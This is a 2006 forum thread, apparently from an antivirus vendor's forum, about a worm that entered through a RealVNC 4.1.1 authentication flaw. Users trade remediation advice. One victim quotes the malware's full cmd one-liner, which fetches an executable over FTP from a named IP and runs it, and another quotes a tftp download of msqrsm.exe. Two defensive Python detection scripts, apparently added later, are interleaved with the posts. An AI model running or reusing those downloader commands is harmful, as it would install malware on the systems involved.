Author Topic: DOS (tftp) virus

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #15 on: September 24, 2006, 04:47:58 AM »
Hi aplcom,

Congratulations!! 8) The last thing I would have focused on.

Great piece of work. My daughter, with 95% probability, was at the time running the VNC 4.1.1 server to allow me to log in. It was a great mistake to start it up with the computer, as we rarely use it, but I thought it was safe, so when I saw it running a few weeks ago while in Europe I did not think much about it. I had been wondering whether you would come back and say that you still had the problem; I did not feel confident this was the cause you were finding, but I did not know enough to question your finding.

Naturally VNC is set to go through the firewall. I feel much better, apart from the stupid thing of letting VNC run needlessly, but of course the idea was that I could connect whenever she is online.

Did you work out from the packet sniffing what the origin IP of the controller was? By the way, I am no expert on packet sniffing; I only have the program and used it trying to figure out why my IP phone would not connect to another IP address on the same ISP network (IP direct to IP, no middleman).

Many thanks for coming to the forum and sharing your information. I feel much relieved on this occasion. I will update and rename tftp as well.

C.


mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #16 on: September 24, 2006, 04:51:39 AM »
Very nice indeed, Otto. Thanks for the update.

aplcom

  • Guest
Re: DOS (tftp) virus
« Reply #17 on: September 24, 2006, 01:16:55 PM »
Hi Cylosine,

I used Ethereal to monitor the traffic once the run command was executed, then analysed the packet data offline. I was able to see that it was port 5900 (VNC) that was being compromised (thankfully not in full-screen mode, rather strictly in command mode!!!), hence the culprit was trying to further compromise the system by downloading the worm programs and backdoors. This is a relatively new exploit, so thankfully no damage was done.

I did do a traceback and found the offending IP, reported it plus the logs to the ISP, but I doubt that anything will come of it. It's a hacker's world!!!! (At least on Win-x machines; I have no problems whatsoever on my Linux boxes!!!!!)

It is a good idea to rename or move programs like ftp, tftp and cmd.exe (or simply lock them altogether). It is also a good idea to do a thorough check with AVAST as well as PREVX1 (thanks to Keith!!). You can also check out nmap as well as grc.com to check what can get through your computer's IP and ports.

Good luck and hope this also solves your problem.

Rgds. Otto.

mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #18 on: September 24, 2006, 02:52:47 PM »
I hate freewares becoming shareware.

I hate that too. But it's still a good program, imo, even if the marketing strategy stinks :)

Lisandro

  • Avast team
Re: DOS (tftp) virus
« Reply #19 on: September 24, 2006, 03:40:00 PM »
I hate that too. But it's still a good program, imo, even if the marketing strategy stinks :)
Other programs could do the same or better while being freeware (or, at least, having a Lite or free version).
For instance: System Safety Monitor (http://syssafety.com/) :)
The best things in life are free.

FXsan78

  • Guest
Re: DOS (tftp) virus
« Reply #20 on: September 24, 2006, 11:44:25 PM »
Hello,

We have the same malware here, it seems.
It is seen the same way by PrevX1, and regularly activates some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launches them, and a lot of bad things!
Example in a cmd: cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It is MSQRSM, not detected by Avast, nor by other anti-virus (NAV, Grisoft) or anti-spyware (Ad-Aware), but detected by PREVX1.

I'd like to send you the .exe file (237 KB) for analysis and integration into the Avast database, but it is in c:\system volume information\-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and not accessible.
I deactivated Windows System Restore on all hard drives and rebooted, but still have no access to this directory, neither directly nor for anti-virus software!
I am working remotely on my father's PC, and can't boot from a DOS disk!

Any idea how to copy this file and send it to you?
It came from clicking a URL in an HTML spam email... but I erased the email (just too soon...)

OS = Windows XP SP2 Home, up to date with updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+    512 MB ram
Mail client: Thunderbird
NAV + Avast

The software launches CMD windows with TFTP xx download scripts, it prevents Mozilla and Thunderbird from connecting to the web and to SMTP/POP accounts, it creates various exe files in windows/system32, which are executed (seen in the task manager), etc. QUITE HARMFUL...

Thanks
FX
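The FTP-script one-liner FXsan78 pasted above and the `tftp -i <host> GET <file>` form reported further down this thread are the same downloader pattern: write a script, fetch a payload, run it, delete the script. The following is an added example, not code from this thread or from any product mentioned in it, that pulls the download server, port, payload name and whether the payload is then executed out of such a command line, so a process-creation or Run-box log can be swept for it. The sample command lines are constructed from what the posters quoted; the class, function and field names are assumptions of mine.

```python
"""Pull download IOCs out of the cmd.exe one-liners quoted in this thread.

Added example; the field names, function names and sample lines are my own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class DownloadIOC:
    protocol: str           # "ftp" or "tftp"
    host: str               # server the payload is fetched from
    port: Optional[int]     # FTP control port when the script names one
    filename: str           # payload name as fetched
    executed: bool          # payload name also appears as its own command segment


# FTP-script form: echo OPEN <host> [<port>]>x & echo GET <file>>>x & ... & FTP -n -s:x
FTP_SCRIPT_RE = re.compile(
    r"echo\s+OPEN\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?:\s+(?P<port>\d{1,5}))?\s*>\s*(?P<script>[^\s&>]+)"
    r".*?echo\s+GET\s+(?P<file>[^\s&>]+)\s*>>\s*(?P=script)"
    r".*?\bFTP\s+(?:-[A-Za-z]+\s+)*-s:(?P=script)",
    re.IGNORECASE,
)

# tftp form: tftp -i <host> GET <file>
TFTP_RE = re.compile(
    r"\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>[^\s&]+)\s+GET\s+(?P<file>[^\s&>]+)",
    re.IGNORECASE,
)


def _segments(cmdline: str) -> List[str]:
    """Split a cmd.exe line on '&' into its individual commands."""
    return [seg.strip() for seg in cmdline.split("&") if seg.strip()]


def _is_executed(cmdline: str, filename: str) -> bool:
    """True when the fetched file is also run as its own command (e.g. '&msqrsm.exe&')."""
    return any(seg.lower() == filename.lower() for seg in _segments(cmdline))


def extract_download_ioc(cmdline: str) -> Optional[DownloadIOC]:
    """Return the download IOC embedded in one command line, or None if it carries none."""
    m = FTP_SCRIPT_RE.search(cmdline)
    if m:
        port = int(m.group("port")) if m.group("port") else None
        return DownloadIOC("ftp", m.group("host"), port, m.group("file"),
                           _is_executed(cmdline, m.group("file")))
    m = TFTP_RE.search(cmdline)
    if m:
        return DownloadIOC("tftp", m.group("host"), None, m.group("file"),
                           _is_executed(cmdline, m.group("file")))
    return None


def scan_command_lines(lines: List[str]) -> List[DownloadIOC]:
    """Sweep a list of command lines (e.g. from a process-creation log) for downloaders."""
    found = []
    for line in lines:
        ioc = extract_download_ioc(line)
        if ioc is not None:
            found.append(ioc)
    return found


# Constructed sample: the FTP one-liner FXsan78 pasted, the tftp form leiw saw
# (host 0.0.0.0 as he wrote it, joined into one line for the example), and a benign line.
SAMPLE_COMMAND_LINES = [
    "cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x"
    "&FTP -n -s:x&84785_redworld2.exe&del x&exit",
    "cmd /c tftp -i 0.0.0.0 GET msqrsm.exe&msqrsm.exe",
    "cmd /c dir c:\\windows\\system32",
]

if __name__ == "__main__":
    for ioc in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(ioc)
```

Feed it the command lines from whatever process or Run-box logging you have; the `executed` flag separates a script that merely staged a file from one that launched it, which is the difference between a failed and a successful infection attempt.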

aplcom

  • Guest
Re: DOS (tftp) virus
« Reply #21 on: September 25, 2006, 04:31:57 AM »
Hello FX,

You mention that you are working remotely on your dad's machine? Are you using RealVNC 4.1.1? If so, it has a security hole that can be breached in the auth module. Check out this site for more info:

http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Rgds. Otto.

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #22 on: September 25, 2006, 05:20:15 AM »
Hi aplcom,

Thank you for the Ethereal information; I understand. You are right that action is unlikely from the ISP. Since this is now running in Europe too, I assume Scotland Yard already knows about it.

From what we experience, at least on some occasions [yes, still running, but that was an oversight on our behalf], it seems to be a download to another IP address than the host machine. The trouble you saw was the attempt to download to your IP address?

I just saw your question to FXsan78 come in; I was going to inquire about the version too. I guess he is in trouble, as the dirty software is already running.

@FXsan78
What keyboard layout is installed on your attacked machine? I noticed the French at the bottom and I am very interested in the type of keyboard you use on the target machine.

C.

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #23 on: September 25, 2006, 05:29:15 AM »
Hi aplcom,

I forgot to add that for many weeks our computer has been running in 'stealth' mode according to grc.com. That was why I could not figure out how something had gotten through, apparently without any action on the part of the operator. It is however likely to be wishful thinking that my daughter did not get it by email.

With VNC running all the time, well, bad luck for us.

C.

mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #24 on: September 25, 2006, 01:47:15 PM »
I deactivated Windows System Restore on all hard drives and rebooted, but still have no access to this directory, neither directly nor for anti-virus software!

Any idea how to copy this file and send it to you?

Hi FX,

When you turned off System Restore you effectively deleted the file from that location. If it's still on your hard drive somewhere else you can email a zipped and password-protected sample to virus@avast.com. Make sure to explain that it is an undetected virus and provide the password in the body of your email.

If you're using RealVNC make sure you follow aplcom's link to patch this security hole.

@aplcom and cylosine,

If FX's infection is the same as yours then you may find the problem recurs even after applying the RealVNC patch. If it does then do as FX did: turn off System Restore, reboot, and scan again.

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #25 on: September 25, 2006, 04:16:32 PM »
We have installed RealVNC 4.1.2 and are trying to log the attacks. They seem to still occur, but now Sygate Personal Firewall is warning of attempts to connect to the VNC session. We have decided to keep the VNC server running for a while.

From the data we believe that the attack is coming from a computer in the same big network to which our computer is connected. I am guessing this is a random number and that it is automated. I hope to catch a few more before the attacks stop. The originator can't be so silly as to keep it up for a long time, allowing tracing.

I noticed that the free version of VNC is a bit limited in its use of encryption; for this reason I am reconsidering its use over the internet. It is a bit of a jungle to get through safely.

C.

aplcom

  • Guest
Re: DOS (tftp) virus
« Reply #26 on: September 25, 2006, 04:43:12 PM »
Hi,

I've not had any recurrence at all. Once I realized what the problem was, I booted from a clean "Win Live CD" and cleaned the HDD (deleted all tmp areas, deleted Recycled, etc.), ran several different antivirus scanners and also manually cleaned the registry. I also put cmd.exe, tftp.exe, ftp.exe and several other programs into a secure area only accessible by me (and also renamed those programs), just to be safe. I also re-installed the firewall from scratch and set new rules (using ZoneAlarm: ONLY VNC has server rights, all else locked out).

I agree, the attack seems to occur on the same ISP network (mine is 221.124.x.y), which leads me to believe that someone's computer on the network is compromised and the hacker is using that system to hack others on the same network. As the attack is identical every time, I also can't believe the hacker to be so stupid (hence it may be a bot??)

You can also consider UltraVNC or TightVNC; both are free, both offer super encryption, and both don't have the auth security hole. However, RealVNC 4.1.2 seems to have solved most of my problems.

Keeping my fingers crossed, but all's well so far!!

Rgds.

FXsan78

  • Guest
Re: DOS (tftp) virus
« Reply #27 on: September 27, 2006, 01:07:43 AM »
Hello,

@aplcom/Otto, yes, I was using RealVNC 4.1.1.
I upgraded to 4.2 (30-day version) after reading the post here.
Now I have found a version 4.1.2 which is full, without the 30-day licence. I will install it after solving everything.

@cylosine, yes AZERTY french keyboard

@mauserme, as I said, I deleted the email I suspected of having the link that imported the virus, and sorry, I could not send it to you.

Tonight NAV reports a Magister virus. I will try the removal tool, but will need some local aid for booting in safe mode ;-)

Thanks to all
fX

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #28 on: September 27, 2006, 01:48:04 AM »
Hi FXsan78,

VNC 4.2 is the "VNC Personal" version, which costs money. I also got a bit confused and downloaded this, but went searching a bit more for the so-called "VNC Free" until I found it.

I am making a strong guess that the machine that attacked you also had a French AZERTY keyboard; this is however unlikely to be of any help.

Depending on how familiar you are with computers, I can recommend always having a BartPE boot disk; this is a cut-down version of Windows which will boot and run Windows off a CD, and you can access your hard disk from this environment.

This is similar to what aplcom is saying about using a "Win Live CD".

C.

leiw

  • Guest
Re: DOS (tftp) virus
« Reply #29 on: October 01, 2006, 08:53:31 AM »
Hi all, this is my first post,

My company has 4 servers running: 3 are Windows 2000 and 1 is Windows 2003. 4 days ago, when I was using VNC to remote into my company servers from my home, I saw all servers automatically open a cmd command via Run, and in the command it automatically typed tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe. I checked the firewall log, and it always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x means random), SRC port 22xx (xx means random), DEST port 5900, and in 1 minute it can send many packets to random private IPs....

Can any brother tell me what type of virus infected it, and how to fix this problem?
Or do I just need to upgrade the VNC version to 4.1.2 to solve all problems?

Home VNC version 4.1.2, company server VNC version 4.1.1

Thanks!!!
Wilson
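Wilson's firewall log (one internal source, random 192.168.x.x destinations, ephemeral 22xx source ports, destination port 5900, many packets a minute) is the classic signature of a host sweeping its own subnet for VNC servers, and it is something a firewall log can be checked for directly. The following is an added example, not code from this thread or from any firewall or product mentioned in it: it parses constructed log lines in an assumed "timestamp ACTION TCP src:port -> dst:port" layout and flags any source that reaches at least ten distinct hosts on port 5900 inside a sixty-second window, while leaving an administrator who reconnects to one server many times unflagged. The line format, function names, thresholds and sample addresses are assumptions of mine.

```python
"""Flag hosts that sweep the local subnet for VNC (TCP/5900) from firewall log lines.

Added example; the log format, function names and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Optional

# Assumed log line layout: "<YYYY-mm-dd HH:MM:SS> <ACTION> TCP <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+\S+\s+TCP\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d{1,5})\s*->\s*"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d{1,5})\s*$"
)


class Flow(NamedTuple):
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def parse_line(line: str) -> Optional[Flow]:
    """Parse one log line; lines that do not fit the assumed layout are ignored."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return Flow(datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
                m.group("src"), int(m.group("sport")),
                m.group("dst"), int(m.group("dport")))


def find_vnc_scanners(lines: List[str], dport: int = 5900,
                      window: timedelta = timedelta(seconds=60),
                      min_targets: int = 10) -> Dict[str, int]:
    """Return {source: most distinct destinations on dport seen within one window}
    for every source that reached at least min_targets distinct hosts.

    An admin reconnecting to one server has a single distinct destination and is
    not flagged; a worm probing random addresses is.
    """
    per_src: Dict[str, List[Flow]] = defaultdict(list)
    for line in lines:
        flow = parse_line(line)
        if flow is not None and flow.dport == dport:
            per_src[flow.src].append(flow)

    hits: Dict[str, int] = {}
    for src, flows in per_src.items():
        flows.sort(key=lambda f: f.ts)
        best, left = 0, 0
        for right in range(len(flows)):
            # slide the left edge so the window spans at most `window`
            while flows[right].ts - flows[left].ts > window:
                left += 1
            distinct = len({f.dst for f in flows[left:right + 1]})
            best = max(best, distinct)
        if best >= min_targets:
            hits[src] = best
    return hits


def _constructed_log() -> List[str]:
    """Constructed sample modelled on the thread: 192.168.0.3 probes a different
    192.168.x.x host every two seconds from ephemeral 22xx ports, an admin at
    192.168.0.50 reconnects to one server, plus unrelated web traffic and a bad line."""
    base = datetime(2006, 10, 1, 8, 40, 0)
    lines = []
    for i in range(15):
        ts = base + timedelta(seconds=2 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} DROP TCP 192.168.0.3:{2200 + i} "
                     f"-> 192.168.{i + 1}.{(7 * i) % 250 + 1}:5900")
    for i in range(12):
        ts = base + timedelta(seconds=5 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} ALLOW TCP 192.168.0.50:{3300 + i} -> 192.168.0.3:5900")
    lines.append(f"{base:%Y-%m-%d %H:%M:%S} ALLOW TCP 192.168.0.3:2299 -> 192.168.0.1:80")
    lines.append("malformed line that should be skipped")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for src, n in find_vnc_scanners(SAMPLE_LOG).items():
        print(f"{src} reached {n} distinct hosts on TCP/5900 inside one window")
```

Adjust `LOG_RE` to your firewall's real export format and tune `min_targets` to the size of the subnet; the useful signal is the count of distinct destinations per source in a short window, not the raw packet count, which is why the admin's repeated reconnects do not trip it.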